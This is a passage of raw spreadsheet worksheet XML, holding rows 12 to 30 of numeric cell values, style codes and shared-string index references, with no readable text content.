      </c>
      <c r="AD11" s="12"/>
      <c r="AE11" s="12"/>
      <c r="AF11" s="5"/>
    </row>
    <row r="12">
      <c r="A12" s="6">
        <f t="shared" si="1"/>
        <v>0.127453165</v>
      </c>
      <c r="B12" s="6">
        <v>1.7510734E7</v>
      </c>
      <c r="C12" s="6">
        <v>1.0</v>
      </c>
      <c r="D12" s="8"/>
      <c r="E12" s="8"/>
      <c r="F12" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G12" s="8"/>
      <c r="H12" s="6">
        <v>1.0</v>
      </c>
      <c r="I12" s="6">
        <v>215.0</v>
      </c>
      <c r="J12" s="13" t="s">
        <v>74</v>
      </c>
      <c r="K12" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L12" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M12" s="10" t="s">
        <v>31</v>
      </c>
      <c r="N12" s="13" t="s">
        <v>33</v>
      </c>
      <c r="O12" s="4" t="s">
        <v>80</v>
      </c>
      <c r="P12" s="4" t="s">
        <v>81</v>
      </c>
      <c r="Q12" s="6">
        <v>1523361.0</v>
      </c>
      <c r="R12" s="7"/>
      <c r="S12" s="6">
        <v>-1.0</v>
      </c>
      <c r="T12" s="7"/>
      <c r="U12" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V12" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W12" s="2" t="s">
        <v>82</v>
      </c>
      <c r="X12" s="6">
        <v>0.0</v>
      </c>
      <c r="Y12" s="6">
        <v>3.0</v>
      </c>
      <c r="Z12" s="7"/>
      <c r="AA12" s="7"/>
      <c r="AB12" s="7"/>
      <c r="AC12" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE12" s="8"/>
      <c r="AF12" s="15"/>
    </row>
    <row r="13">
      <c r="A13" s="6">
        <f t="shared" si="1"/>
        <v>0.02890060401</v>
      </c>
      <c r="B13" s="6">
        <v>2.0854994E7</v>
      </c>
      <c r="C13" s="6">
        <v>1.0</v>
      </c>
      <c r="D13" s="6">
        <v>2.0856047E7</v>
      </c>
      <c r="E13" s="8"/>
      <c r="F13" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G13" s="8"/>
      <c r="H13" s="6">
        <v>4.0</v>
      </c>
      <c r="I13" s="6">
        <v>1121.0</v>
      </c>
      <c r="J13" s="13" t="s">
        <v>74</v>
      </c>
      <c r="K13" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L13" s="17"/>
      <c r="M13" s="18" t="s">
        <v>83</v>
      </c>
      <c r="N13" s="17"/>
      <c r="O13" s="4" t="s">
        <v>84</v>
      </c>
      <c r="P13" s="4" t="s">
        <v>85</v>
      </c>
      <c r="Q13" s="6">
        <v>2622438.0</v>
      </c>
      <c r="R13" s="7"/>
      <c r="S13" s="6">
        <v>2622438.0</v>
      </c>
      <c r="T13" s="7"/>
      <c r="U13" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V13" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W13" s="2" t="s">
        <v>86</v>
      </c>
      <c r="X13" s="6">
        <v>1.0</v>
      </c>
      <c r="Y13" s="6">
        <v>15.0</v>
      </c>
      <c r="Z13" s="6">
        <v>0.0</v>
      </c>
      <c r="AA13" s="7"/>
      <c r="AB13" s="7"/>
      <c r="AC13" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE13" s="8"/>
      <c r="AF13" s="15"/>
    </row>
    <row r="14">
      <c r="A14" s="6">
        <f t="shared" si="1"/>
        <v>0.7590725909</v>
      </c>
      <c r="B14" s="6">
        <v>1.7396303E7</v>
      </c>
      <c r="C14" s="6">
        <v>1.0</v>
      </c>
      <c r="D14" s="8"/>
      <c r="E14" s="8"/>
      <c r="F14" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G14" s="8"/>
      <c r="H14" s="6">
        <v>-1.0</v>
      </c>
      <c r="I14" s="6">
        <v>2564.0</v>
      </c>
      <c r="J14" s="13" t="s">
        <v>74</v>
      </c>
      <c r="K14" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L14" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M14" s="13" t="s">
        <v>87</v>
      </c>
      <c r="N14" s="17"/>
      <c r="O14" s="4" t="s">
        <v>88</v>
      </c>
      <c r="P14" s="4" t="s">
        <v>89</v>
      </c>
      <c r="Q14" s="6">
        <v>2453350.0</v>
      </c>
      <c r="R14" s="7"/>
      <c r="S14" s="6">
        <v>2453350.0</v>
      </c>
      <c r="T14" s="7"/>
      <c r="U14" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V14" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W14" s="2" t="s">
        <v>90</v>
      </c>
      <c r="X14" s="6">
        <v>2.0</v>
      </c>
      <c r="Y14" s="6">
        <v>0.0</v>
      </c>
      <c r="Z14" s="6">
        <v>0.0</v>
      </c>
      <c r="AA14" s="7"/>
      <c r="AB14" s="7"/>
      <c r="AC14" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE14" s="8"/>
      <c r="AF14" s="15"/>
    </row>
    <row r="15">
      <c r="A15" s="6">
        <f t="shared" si="1"/>
        <v>0.7542772181</v>
      </c>
      <c r="B15" s="6">
        <v>5.908227E7</v>
      </c>
      <c r="C15" s="6">
        <v>1.0</v>
      </c>
      <c r="D15" s="6">
        <v>5.9082593E7</v>
      </c>
      <c r="E15" s="8"/>
      <c r="F15" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G15" s="8"/>
      <c r="H15" s="6">
        <v>0.0</v>
      </c>
      <c r="I15" s="6">
        <v>402.0</v>
      </c>
      <c r="J15" s="13" t="s">
        <v>74</v>
      </c>
      <c r="K15" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L15" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M15" s="13" t="s">
        <v>91</v>
      </c>
      <c r="N15" s="17"/>
      <c r="O15" s="4" t="s">
        <v>92</v>
      </c>
      <c r="P15" s="4" t="s">
        <v>93</v>
      </c>
      <c r="Q15" s="6">
        <v>4915813.0</v>
      </c>
      <c r="R15" s="7"/>
      <c r="S15" s="7"/>
      <c r="T15" s="7"/>
      <c r="U15" s="8"/>
      <c r="V15" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W15" s="2" t="s">
        <v>94</v>
      </c>
      <c r="X15" s="6">
        <v>1.0</v>
      </c>
      <c r="Y15" s="6">
        <v>0.0</v>
      </c>
      <c r="Z15" s="7"/>
      <c r="AA15" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB15" s="7"/>
      <c r="AC15" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE15" s="8"/>
      <c r="AF15" s="15"/>
    </row>
    <row r="16">
      <c r="A16" s="6">
        <f t="shared" si="1"/>
        <v>0.3657249008</v>
      </c>
      <c r="B16" s="6">
        <v>3.9078025E7</v>
      </c>
      <c r="C16" s="6">
        <v>1.0</v>
      </c>
      <c r="D16" s="8"/>
      <c r="E16" s="8"/>
      <c r="F16" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G16" s="8"/>
      <c r="H16" s="6">
        <v>3.0</v>
      </c>
      <c r="I16" s="6">
        <v>6217.0</v>
      </c>
      <c r="J16" s="19" t="s">
        <v>74</v>
      </c>
      <c r="K16" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L16" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M16" s="18" t="s">
        <v>95</v>
      </c>
      <c r="N16" s="17"/>
      <c r="O16" s="4" t="s">
        <v>96</v>
      </c>
      <c r="P16" s="4" t="s">
        <v>97</v>
      </c>
      <c r="Q16" s="6">
        <v>6397310.0</v>
      </c>
      <c r="R16" s="7"/>
      <c r="S16" s="6">
        <v>472495.0</v>
      </c>
      <c r="T16" s="7"/>
      <c r="U16" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V16" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W16" s="2" t="s">
        <v>98</v>
      </c>
      <c r="X16" s="6">
        <v>1.0</v>
      </c>
      <c r="Y16" s="6">
        <v>2.0</v>
      </c>
      <c r="Z16" s="7"/>
      <c r="AA16" s="7"/>
      <c r="AB16" s="7"/>
      <c r="AC16" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE16" s="8"/>
      <c r="AF16" s="15"/>
    </row>
    <row r="17">
      <c r="A17" s="6">
        <f t="shared" si="1"/>
        <v>0.3948710428</v>
      </c>
      <c r="B17" s="6">
        <v>5.2596843E7</v>
      </c>
      <c r="C17" s="6">
        <v>1.0</v>
      </c>
      <c r="D17" s="8"/>
      <c r="E17" s="8"/>
      <c r="F17" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G17" s="8"/>
      <c r="H17" s="6">
        <v>0.0</v>
      </c>
      <c r="I17" s="6">
        <v>209.0</v>
      </c>
      <c r="J17" s="19" t="s">
        <v>74</v>
      </c>
      <c r="K17" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L17" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M17" s="13" t="s">
        <v>99</v>
      </c>
      <c r="N17" s="17"/>
      <c r="O17" s="4" t="s">
        <v>100</v>
      </c>
      <c r="P17" s="4" t="s">
        <v>101</v>
      </c>
      <c r="Q17" s="6">
        <v>3595231.0</v>
      </c>
      <c r="R17" s="7"/>
      <c r="S17" s="7"/>
      <c r="T17" s="7"/>
      <c r="U17" s="8"/>
      <c r="V17" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W17" s="2" t="s">
        <v>102</v>
      </c>
      <c r="X17" s="6">
        <v>1.0</v>
      </c>
      <c r="Y17" s="6">
        <v>2.0</v>
      </c>
      <c r="Z17" s="7"/>
      <c r="AA17" s="7"/>
      <c r="AB17" s="7"/>
      <c r="AC17" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE17" s="8"/>
      <c r="AF17" s="15"/>
    </row>
    <row r="18">
      <c r="A18" s="6">
        <f t="shared" si="1"/>
        <v>0.144293959</v>
      </c>
      <c r="B18" s="6">
        <v>5.0473385E7</v>
      </c>
      <c r="C18" s="6">
        <v>1.0</v>
      </c>
      <c r="D18" s="7"/>
      <c r="E18" s="8"/>
      <c r="F18" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G18" s="8"/>
      <c r="H18" s="6">
        <v>0.0</v>
      </c>
      <c r="I18" s="6">
        <v>183.0</v>
      </c>
      <c r="J18" s="19" t="s">
        <v>74</v>
      </c>
      <c r="K18" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L18" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M18" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N18" s="13" t="s">
        <v>103</v>
      </c>
      <c r="O18" s="4" t="s">
        <v>104</v>
      </c>
      <c r="P18" s="4" t="s">
        <v>105</v>
      </c>
      <c r="Q18" s="6">
        <v>9829151.0</v>
      </c>
      <c r="R18" s="7"/>
      <c r="S18" s="7"/>
      <c r="T18" s="7"/>
      <c r="U18" s="8"/>
      <c r="V18" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W18" s="2" t="s">
        <v>106</v>
      </c>
      <c r="X18" s="6">
        <v>1.0</v>
      </c>
      <c r="Y18" s="6">
        <v>0.0</v>
      </c>
      <c r="Z18" s="7"/>
      <c r="AA18" s="7"/>
      <c r="AB18" s="7"/>
      <c r="AC18" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE18" s="8"/>
      <c r="AF18" s="15"/>
    </row>
    <row r="19">
      <c r="A19" s="6">
        <f t="shared" si="1"/>
        <v>0.6878417292</v>
      </c>
      <c r="B19" s="6">
        <v>1.9316612E7</v>
      </c>
      <c r="C19" s="6">
        <v>1.0</v>
      </c>
      <c r="D19" s="7"/>
      <c r="E19" s="8"/>
      <c r="F19" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G19" s="8"/>
      <c r="H19" s="6">
        <v>0.0</v>
      </c>
      <c r="I19" s="6">
        <v>3559.0</v>
      </c>
      <c r="J19" s="19" t="s">
        <v>74</v>
      </c>
      <c r="K19" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L19" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M19" s="13" t="s">
        <v>74</v>
      </c>
      <c r="N19" s="13" t="s">
        <v>74</v>
      </c>
      <c r="O19" s="4" t="s">
        <v>107</v>
      </c>
      <c r="P19" s="4" t="s">
        <v>108</v>
      </c>
      <c r="Q19" s="6">
        <v>2870428.0</v>
      </c>
      <c r="R19" s="7"/>
      <c r="S19" s="7"/>
      <c r="T19" s="7"/>
      <c r="U19" s="8"/>
      <c r="V19" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W19" s="2" t="s">
        <v>109</v>
      </c>
      <c r="X19" s="6">
        <v>2.0</v>
      </c>
      <c r="Y19" s="6">
        <v>2.0</v>
      </c>
      <c r="Z19" s="6">
        <v>0.0</v>
      </c>
      <c r="AA19" s="7"/>
      <c r="AB19" s="7"/>
      <c r="AC19" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE19" s="8"/>
      <c r="AF19" s="15"/>
    </row>
    <row r="20">
      <c r="A20" s="6">
        <f t="shared" si="1"/>
        <v>0.6194077796</v>
      </c>
      <c r="B20" s="6">
        <v>6.5571661E7</v>
      </c>
      <c r="C20" s="6">
        <v>1.0</v>
      </c>
      <c r="D20" s="7"/>
      <c r="E20" s="8"/>
      <c r="F20" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G20" s="8"/>
      <c r="H20" s="6">
        <v>0.0</v>
      </c>
      <c r="I20" s="6">
        <v>198.0</v>
      </c>
      <c r="J20" s="19" t="s">
        <v>74</v>
      </c>
      <c r="K20" s="13" t="s">
        <v>74</v>
      </c>
      <c r="L20" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M20" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N20" s="13" t="s">
        <v>0</v>
      </c>
      <c r="O20" s="4" t="s">
        <v>110</v>
      </c>
      <c r="P20" s="4" t="s">
        <v>111</v>
      </c>
      <c r="Q20" s="6">
        <v>9124190.0</v>
      </c>
      <c r="R20" s="7"/>
      <c r="S20" s="7"/>
      <c r="T20" s="7"/>
      <c r="U20" s="8"/>
      <c r="V20" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W20" s="2" t="s">
        <v>112</v>
      </c>
      <c r="X20" s="6">
        <v>1.0</v>
      </c>
      <c r="Y20" s="6">
        <v>0.0</v>
      </c>
      <c r="Z20" s="7"/>
      <c r="AA20" s="7"/>
      <c r="AB20" s="7"/>
      <c r="AC20" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE20" s="8"/>
      <c r="AF20" s="15"/>
    </row>
    <row r="21">
      <c r="A21" s="6">
        <f t="shared" si="1"/>
        <v>0.3752777212</v>
      </c>
      <c r="B21" s="6">
        <v>1.156047E7</v>
      </c>
      <c r="C21" s="6">
        <v>1.0</v>
      </c>
      <c r="D21" s="8"/>
      <c r="E21" s="8"/>
      <c r="F21" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G21" s="8"/>
      <c r="H21" s="6">
        <v>1.0</v>
      </c>
      <c r="I21" s="6">
        <v>1301.0</v>
      </c>
      <c r="J21" s="13" t="s">
        <v>75</v>
      </c>
      <c r="K21" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L21" s="10" t="s">
        <v>113</v>
      </c>
      <c r="M21" s="10" t="s">
        <v>75</v>
      </c>
      <c r="N21" s="20"/>
      <c r="O21" s="4" t="s">
        <v>114</v>
      </c>
      <c r="P21" s="4" t="s">
        <v>115</v>
      </c>
      <c r="Q21" s="6">
        <v>1503282.0</v>
      </c>
      <c r="R21" s="8"/>
      <c r="S21" s="6">
        <v>3366929.0</v>
      </c>
      <c r="T21" s="8"/>
      <c r="U21" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V21" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W21" s="2" t="s">
        <v>116</v>
      </c>
      <c r="X21" s="6">
        <v>2.0</v>
      </c>
      <c r="Y21" s="6">
        <v>0.0</v>
      </c>
      <c r="Z21" s="8"/>
      <c r="AA21" s="8"/>
      <c r="AB21" s="8"/>
      <c r="AC21" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE21" s="8"/>
      <c r="AF21" s="14"/>
    </row>
    <row r="22">
      <c r="A22" s="6">
        <f t="shared" si="1"/>
        <v>0.899623947</v>
      </c>
      <c r="B22" s="6">
        <v>1.2172731E7</v>
      </c>
      <c r="C22" s="6">
        <v>1.0</v>
      </c>
      <c r="D22" s="6">
        <v>1.2172797E7</v>
      </c>
      <c r="E22" s="8"/>
      <c r="F22" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G22" s="8"/>
      <c r="H22" s="6">
        <v>0.0</v>
      </c>
      <c r="I22" s="6">
        <v>571.0</v>
      </c>
      <c r="J22" s="13" t="s">
        <v>75</v>
      </c>
      <c r="K22" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L22" s="10" t="s">
        <v>61</v>
      </c>
      <c r="M22" s="10" t="s">
        <v>75</v>
      </c>
      <c r="N22" s="13" t="s">
        <v>117</v>
      </c>
      <c r="O22" s="4" t="s">
        <v>118</v>
      </c>
      <c r="P22" s="4" t="s">
        <v>119</v>
      </c>
      <c r="Q22" s="6">
        <v>1500742.0</v>
      </c>
      <c r="R22" s="8"/>
      <c r="S22" s="8"/>
      <c r="T22" s="8"/>
      <c r="U22" s="8"/>
      <c r="V22" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W22" s="2" t="s">
        <v>120</v>
      </c>
      <c r="X22" s="6">
        <v>1.0</v>
      </c>
      <c r="Y22" s="6">
        <v>2.0</v>
      </c>
      <c r="Z22" s="8"/>
      <c r="AA22" s="8"/>
      <c r="AB22" s="8"/>
      <c r="AC22" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE22" s="8"/>
      <c r="AF22" s="14"/>
    </row>
    <row r="23">
      <c r="A23" s="6">
        <f t="shared" si="1"/>
        <v>0.9128925178</v>
      </c>
      <c r="B23" s="6">
        <v>7.4705239E7</v>
      </c>
      <c r="C23" s="6">
        <v>1.0</v>
      </c>
      <c r="D23" s="8"/>
      <c r="E23" s="8"/>
      <c r="F23" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G23" s="8"/>
      <c r="H23" s="6">
        <v>0.0</v>
      </c>
      <c r="I23" s="6">
        <v>77.0</v>
      </c>
      <c r="J23" s="3" t="s">
        <v>121</v>
      </c>
      <c r="K23" s="3" t="s">
        <v>32</v>
      </c>
      <c r="L23" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M23" s="10" t="s">
        <v>121</v>
      </c>
      <c r="N23" s="13" t="s">
        <v>122</v>
      </c>
      <c r="O23" s="4" t="s">
        <v>123</v>
      </c>
      <c r="P23" s="4" t="s">
        <v>124</v>
      </c>
      <c r="Q23" s="6">
        <v>2.0115742E7</v>
      </c>
      <c r="R23" s="8"/>
      <c r="S23" s="8"/>
      <c r="T23" s="8"/>
      <c r="U23" s="8"/>
      <c r="V23" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W23" s="2" t="s">
        <v>125</v>
      </c>
      <c r="X23" s="6">
        <v>0.0</v>
      </c>
      <c r="Y23" s="6">
        <v>0.0</v>
      </c>
      <c r="Z23" s="8"/>
      <c r="AA23" s="8"/>
      <c r="AB23" s="8"/>
      <c r="AC23" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AD23" s="12"/>
      <c r="AE23" s="12"/>
      <c r="AF23" s="5"/>
    </row>
    <row r="24">
      <c r="A24" s="6">
        <f t="shared" si="1"/>
        <v>0.6868131272</v>
      </c>
      <c r="B24" s="6">
        <v>2.3274114E7</v>
      </c>
      <c r="C24" s="6">
        <v>1.0</v>
      </c>
      <c r="D24" s="8"/>
      <c r="E24" s="8"/>
      <c r="F24" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G24" s="8"/>
      <c r="H24" s="6">
        <v>0.0</v>
      </c>
      <c r="I24" s="6">
        <v>327.0</v>
      </c>
      <c r="J24" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K24" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L24" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M24" s="10" t="s">
        <v>121</v>
      </c>
      <c r="N24" s="13" t="s">
        <v>126</v>
      </c>
      <c r="O24" s="4" t="s">
        <v>127</v>
      </c>
      <c r="P24" s="4" t="s">
        <v>128</v>
      </c>
      <c r="Q24" s="6">
        <v>356372.0</v>
      </c>
      <c r="R24" s="8"/>
      <c r="S24" s="6">
        <v>2246344.0</v>
      </c>
      <c r="T24" s="8"/>
      <c r="U24" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V24" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W24" s="2" t="s">
        <v>129</v>
      </c>
      <c r="X24" s="6">
        <v>0.0</v>
      </c>
      <c r="Y24" s="6">
        <v>4.0</v>
      </c>
      <c r="Z24" s="8"/>
      <c r="AA24" s="8"/>
      <c r="AB24" s="8"/>
      <c r="AC24" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AD24" s="2" t="s">
        <v>126</v>
      </c>
      <c r="AF24" s="5"/>
    </row>
    <row r="25">
      <c r="A25" s="6">
        <f t="shared" si="1"/>
        <v>0.5455718034</v>
      </c>
      <c r="B25" s="6">
        <v>1.4537167E7</v>
      </c>
      <c r="C25" s="6">
        <v>1.0</v>
      </c>
      <c r="D25" s="6">
        <v>1.4634681E7</v>
      </c>
      <c r="E25" s="8"/>
      <c r="F25" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G25" s="8"/>
      <c r="H25" s="6">
        <v>0.0</v>
      </c>
      <c r="I25" s="6">
        <v>564.0</v>
      </c>
      <c r="J25" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K25" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L25" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M25" s="13" t="s">
        <v>130</v>
      </c>
      <c r="N25" s="13" t="s">
        <v>131</v>
      </c>
      <c r="O25" s="4" t="s">
        <v>132</v>
      </c>
      <c r="P25" s="4" t="s">
        <v>133</v>
      </c>
      <c r="Q25" s="6">
        <v>2013580.0</v>
      </c>
      <c r="R25" s="8"/>
      <c r="S25" s="8"/>
      <c r="T25" s="8"/>
      <c r="U25" s="8"/>
      <c r="V25" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W25" s="2" t="s">
        <v>134</v>
      </c>
      <c r="X25" s="6">
        <v>1.0</v>
      </c>
      <c r="Y25" s="6">
        <v>2.0</v>
      </c>
      <c r="Z25" s="8"/>
      <c r="AA25" s="8"/>
      <c r="AB25" s="8"/>
      <c r="AC25" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE25" s="8"/>
      <c r="AF25" s="14"/>
    </row>
    <row r="26">
      <c r="A26" s="6">
        <f t="shared" si="1"/>
        <v>0.7871732016</v>
      </c>
      <c r="B26" s="6">
        <v>2.6905605E7</v>
      </c>
      <c r="C26" s="6">
        <v>1.0</v>
      </c>
      <c r="D26" s="8"/>
      <c r="E26" s="8"/>
      <c r="F26" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G26" s="8"/>
      <c r="H26" s="6">
        <v>1.0</v>
      </c>
      <c r="I26" s="6">
        <v>733.0</v>
      </c>
      <c r="J26" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K26" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L26" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M26" s="10" t="s">
        <v>121</v>
      </c>
      <c r="N26" s="13" t="s">
        <v>122</v>
      </c>
      <c r="O26" s="4" t="s">
        <v>135</v>
      </c>
      <c r="P26" s="4" t="s">
        <v>136</v>
      </c>
      <c r="Q26" s="6">
        <v>1414018.0</v>
      </c>
      <c r="R26" s="8"/>
      <c r="S26" s="6">
        <v>1414018.0</v>
      </c>
      <c r="T26" s="8"/>
      <c r="U26" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V26" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W26" s="2" t="s">
        <v>137</v>
      </c>
      <c r="X26" s="6">
        <v>0.0</v>
      </c>
      <c r="Y26" s="6">
        <v>2.0</v>
      </c>
      <c r="Z26" s="6">
        <v>0.0</v>
      </c>
      <c r="AA26" s="8"/>
      <c r="AB26" s="8"/>
      <c r="AC26" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE26" s="8"/>
      <c r="AF26" s="14"/>
    </row>
    <row r="27">
      <c r="A27" s="6">
        <f t="shared" si="1"/>
        <v>0.8221120008</v>
      </c>
      <c r="B27" s="6">
        <v>4203638.0</v>
      </c>
      <c r="C27" s="6">
        <v>1.0</v>
      </c>
      <c r="D27" s="6">
        <v>4203679.0</v>
      </c>
      <c r="E27" s="8"/>
      <c r="F27" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G27" s="8"/>
      <c r="H27" s="6">
        <v>1.0</v>
      </c>
      <c r="I27" s="6">
        <v>212.0</v>
      </c>
      <c r="J27" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K27" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L27" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M27" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N27" s="10" t="s">
        <v>122</v>
      </c>
      <c r="O27" s="4" t="s">
        <v>138</v>
      </c>
      <c r="P27" s="4" t="s">
        <v>139</v>
      </c>
      <c r="Q27" s="6">
        <v>186319.0</v>
      </c>
      <c r="R27" s="7"/>
      <c r="S27" s="7"/>
      <c r="T27" s="7"/>
      <c r="U27" s="8"/>
      <c r="V27" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W27" s="2" t="s">
        <v>140</v>
      </c>
      <c r="X27" s="6">
        <v>1.0</v>
      </c>
      <c r="Y27" s="6">
        <v>0.0</v>
      </c>
      <c r="Z27" s="7"/>
      <c r="AA27" s="7"/>
      <c r="AB27" s="7"/>
      <c r="AC27" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE27" s="8"/>
      <c r="AF27" s="15"/>
    </row>
    <row r="28">
      <c r="A28" s="6">
        <f t="shared" si="1"/>
        <v>0.4106402959</v>
      </c>
      <c r="B28" s="6">
        <v>4.8706572E7</v>
      </c>
      <c r="C28" s="6">
        <v>1.0</v>
      </c>
      <c r="D28" s="8"/>
      <c r="E28" s="8"/>
      <c r="F28" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G28" s="8"/>
      <c r="H28" s="6">
        <v>0.0</v>
      </c>
      <c r="I28" s="6">
        <v>156.0</v>
      </c>
      <c r="J28" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K28" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L28" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M28" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N28" s="10" t="s">
        <v>122</v>
      </c>
      <c r="O28" s="4" t="s">
        <v>141</v>
      </c>
      <c r="P28" s="4" t="s">
        <v>142</v>
      </c>
      <c r="Q28" s="6">
        <v>566817.0</v>
      </c>
      <c r="R28" s="8"/>
      <c r="S28" s="8"/>
      <c r="T28" s="8"/>
      <c r="U28" s="8"/>
      <c r="V28" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W28" s="2" t="s">
        <v>143</v>
      </c>
      <c r="X28" s="6">
        <v>1.0</v>
      </c>
      <c r="Y28" s="6">
        <v>0.0</v>
      </c>
      <c r="Z28" s="8"/>
      <c r="AA28" s="8"/>
      <c r="AB28" s="8"/>
      <c r="AC28" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE28" s="8"/>
      <c r="AF28" s="14"/>
    </row>
    <row r="29">
      <c r="A29" s="6">
        <f t="shared" si="1"/>
        <v>0.2813144342</v>
      </c>
      <c r="B29" s="6">
        <v>3.2633168E7</v>
      </c>
      <c r="C29" s="6">
        <v>1.0</v>
      </c>
      <c r="D29" s="8"/>
      <c r="E29" s="8"/>
      <c r="F29" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G29" s="8"/>
      <c r="H29" s="6">
        <v>1.0</v>
      </c>
      <c r="I29" s="6">
        <v>68.0</v>
      </c>
      <c r="J29" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K29" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L29" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M29" s="10" t="s">
        <v>121</v>
      </c>
      <c r="N29" s="13" t="s">
        <v>144</v>
      </c>
      <c r="O29" s="4" t="s">
        <v>145</v>
      </c>
      <c r="P29" s="4" t="s">
        <v>146</v>
      </c>
      <c r="Q29" s="6">
        <v>647845.0</v>
      </c>
      <c r="R29" s="7"/>
      <c r="S29" s="6">
        <v>616443.0</v>
      </c>
      <c r="T29" s="7"/>
      <c r="U29" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V29" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W29" s="2" t="s">
        <v>147</v>
      </c>
      <c r="X29" s="6">
        <v>0.0</v>
      </c>
      <c r="Y29" s="6">
        <v>6.0</v>
      </c>
      <c r="Z29" s="6">
        <v>0.0</v>
      </c>
      <c r="AA29" s="7"/>
      <c r="AB29" s="7"/>
      <c r="AC29" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE29" s="7"/>
      <c r="AF29" s="15"/>
    </row>
    <row r="30">
      <c r="A30" s="6">
        <f t="shared" si="1"/>
        <v>0.9774124156</v>
      </c>
      <c r="B30" s="6">
        <v>1.223962E7</v>
      </c>
      <c r="C30" s="6">
        <v>1.0</v>
      </c>
      <c r="D30" s="6">
        <v>1.2240351E7</v>
      </c>
      <c r="E30" s="8"/>
      <c r="F30" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G30" s="8"/>
      <c r="H30" s="6">
        <v>5.0</v>
